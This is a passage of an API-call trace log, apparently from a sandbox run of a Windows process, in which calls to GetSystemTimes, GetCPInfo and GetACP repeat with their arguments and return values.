lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.404] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.404] GetACP () returned 0x4e4 [0045.404] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.405] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.405] GetACP () returned 0x4e4 [0045.405] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.406] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.406] GetACP () returned 0x4e4 [0045.406] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.407] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.407] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.407] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.408] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.408] GetACP () returned 0x4e4 [0045.408] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.409] GetACP () returned 0x4e4 [0045.409] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.409] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.410] GetACP () returned 0x4e4 [0045.410] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.410] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.411] GetACP () returned 0x4e4 [0045.411] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.411] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: lpCPInfo=0x18fa10) returned 1 [0045.412] GetACP () returned 0x4e4 [0045.412] GetSystemTimes (in: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68 | out: lpIdleTime=0x18fa70, lpKernelTime=0x18fa60, lpUserTime=0x18fa68) returned 1 [0045.412] GetCPInfo (in: CodePage=0x0, lpCPInfo=0x18fa10 | out: 